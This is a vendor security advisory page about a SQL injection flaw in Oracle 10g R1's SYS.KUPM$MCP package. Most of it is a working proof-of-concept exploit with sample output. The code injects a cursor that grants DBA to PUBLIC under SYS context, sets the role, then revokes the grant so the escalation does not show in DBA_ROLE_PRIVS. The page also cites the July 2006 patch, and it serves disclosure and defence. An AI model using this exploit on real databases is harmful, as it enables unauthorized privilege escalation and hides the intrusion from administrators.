Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
SQL Injection via Oracle KUPM$MCP in Oracle 10g R1
Details The following proof of concept exploit code injects code for a privilege escalation via a cursor. This cursor is executed in the SYS context and grants the DBA permission and revoke the privileges directly. The current session has DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS. Example SQL> DECLARE MYC NUMBER; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to public''; commit;end;',0); sys.KUPM$MCP.MAIN('x',''' and 1=dbms_sql.execute ('||myc||')--'); END; / SQL> set role dba; SQL> revoke dba from public; SQL> select * from dba_role_privs where granted_role='DBA'; GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- SYS DBA YES YES WKSYS DBA NO YES SYSMAN DBA NO YES SYSTEM DBA YES YES Patch Information Apply the patches mentioned in Oracle Critical Patch Update July 2006. © 2007 by Red-Database-Security GmbH - 25-mar-2007 |
Definition Exploit |